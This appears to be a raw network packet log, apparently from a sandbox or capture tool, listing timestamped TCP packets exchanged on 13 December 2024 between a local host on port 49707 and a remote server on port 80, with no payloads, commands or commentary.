                                                                                                                                                                Dec 13, 2024 01:37:07.615223885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.616044044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.616167068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.616214991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.617006063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.617146015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.617196083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.617969036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.618083000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.618129015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.618902922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.619023085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.619067907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.619838953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.619966030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.620063066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.620768070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.620851994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.620946884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.621656895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.621757030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.621804953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.622574091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.622684956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.622734070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.623498917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.623594046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.623645067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.624407053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.624506950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.624604940 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.625304937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.625408888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.625459909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.626221895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.626329899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.626378059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.627140045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.627249002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.627294064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.628070116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.628185987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.628237963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.629046917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.629142046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.629230022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.629862070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.629955053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.630002022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.630759954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.630891085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.630940914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.631694078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.631803989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.631846905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.632572889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.632709980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.632819891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.633490086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.633606911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.633693933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.634458065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.634555101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.634597063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.635356903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.635464907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.635513067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.636255026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.636396885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.636488914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.637149096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.637290955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.637337923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.638051033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.638134956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.638180971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.638974905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.639065981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.639117002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.639851093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.639965057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.640012980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.640769005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.640891075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.640989065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.641669989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.641783953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.641829967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.642597914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.642712116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.642759085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.643507004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.643595934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.643642902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.644412041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.644571066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.644670010 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.645324945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.645431042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.645479918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.646235943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.646316051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.646361113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.647169113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.647265911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.647317886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.648051977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.648178101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.648228884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.648972034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.649110079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.649200916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.649883986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.650022984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.650110006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.650831938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.650981903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.651029110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.651684999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.651797056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.651840925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.652618885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.652798891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.652884960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.653517962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.653573036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.653616905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.654453039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.654633999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.654694080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.655344963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.655456066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.655502081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.656234980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.656290054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.656379938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.657166958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.657303095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.657357931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.658073902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.658168077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.658216000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.658965111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.659173965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.659231901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.659867048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.660008907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.660104036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.660799026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.660912991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.661003113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.661674976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.708295107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.805859089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.805903912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.806040049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.806145906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.806271076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.806353092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.807080030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.807178020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.807262897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.807986975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.808026075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.808111906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.808903933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.809011936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.809104919 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.809802055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.809971094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.810059071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.810729027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.810800076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.810942888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.811640978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.811784029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.811877012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.812563896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.812602043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.812705994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.813441038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.813545942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.813637972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.814364910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.814440012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.814533949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.815332890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.815373898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.815462112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.816175938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.816282988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.816370964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.817097902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.817164898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.817251921 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.817980051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.818128109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.818176031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.818950891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.818983078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.819082975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.819797993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.819883108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.819974899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.820754051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.820873022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.820916891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.821610928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.821729898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.821769953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.822532892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.822628975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.822669983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.823436022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.823635101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.823678017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.824350119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.824464083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.824506998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.825254917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.825314045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.825359106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.826200962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.826282978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.826401949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.827095985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.827199936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.827285051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.827955961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.828052998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.828093052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.828902960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.829001904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.829046011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.829852104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.829915047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.829957008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.830753088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.830935955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.831104994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.831650019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.831706047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.831790924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.832602978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.832679033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.832784891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.833481073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.833550930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.833637953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.834373951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.834477901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.834577084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.835282087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.835385084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.835429907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.836178064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.836281061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.836389065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.837105989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.837188005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.837275028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.837987900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.838082075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.838166952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.838920116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.839114904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.839200974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.839793921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.839910030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.839997053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.840723038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.840843916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.840930939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.841631889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.841815948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.841902971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.842535019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.842592955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.842684031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.843461990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.843556881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.843640089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.844351053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.844454050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.844537020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.845297098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.845379114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.845467091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.846182108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.846292019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.846375942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.847125053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.847196102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.847279072 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.848011971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.848093033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.848181963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.848902941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.849016905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.849119902 CET4970780192.168.2.5185.81.68.147
